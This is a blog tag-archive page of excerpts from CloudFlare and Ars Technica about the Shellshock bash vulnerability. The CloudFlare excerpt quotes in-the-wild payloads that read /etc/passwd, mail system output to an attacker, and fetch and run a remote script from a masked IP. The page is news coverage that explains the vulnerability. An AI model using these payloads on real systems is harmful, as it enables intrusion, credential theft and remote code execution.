Tag Archives: Linux

CloudFlare explains Shellshock: it potentially affects web servers, set-top boxes, laptops and telephones

Shellshock is a simple exploit that is seriously bad; CloudFlare talks about how they patched their system so quickly

Inside Shellshock: How hackers are using it to exploit systems.

On Wednesday of last week, details of the Shellshock bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash.

Get system passwords:

() {:;}; /bin/cat /etc/passwd

Email the attacker:

() { :;}; /bin/bash -c “whoami | mail -s ‘example.com l’ [email protected]


() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20

Run Arbitrary script:

() { :;}; /bin/bash -c “cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji”

Shellshock isn’t just an attack on web sites: it’s an attack on anything that’s running bash and accessible across the Internet. That could include hardware devices, set-top boxes, laptop computers, even, perhaps, telephones.

Read the full article at cloudflare.com

Shellshock: a severity 10/10 Bash bug that allows attackers to execute arbitrary commands on web servers

You thought the heartbleed bug was bad? Today’s Bash vulnerability is much much worse


Concern over Bash vulnerability grows as exploit reported “in the wild”

“Shellshock” bug in common GNU shell could be “worm-able,” used to launch kernel exploits.

The vulnerability reported in the GNU Bourne Again Shell (Bash) yesterday, dubbed “Shellshock,” may already have been exploited in the wild to take over Web servers as part of a botnet. More security experts are now weighing in on the severity of the bug, expressing fears that it could be used for an Internet “worm” to exploit large numbers of public Web servers. And the initial fix for the issue still left Bash vulnerable to attack, according to a new US CERT National Vulnerability Database entry. A second vulnerability in Bash allows for an attacker to overwrite files on the targeted system.

Read the full article at Ars Technica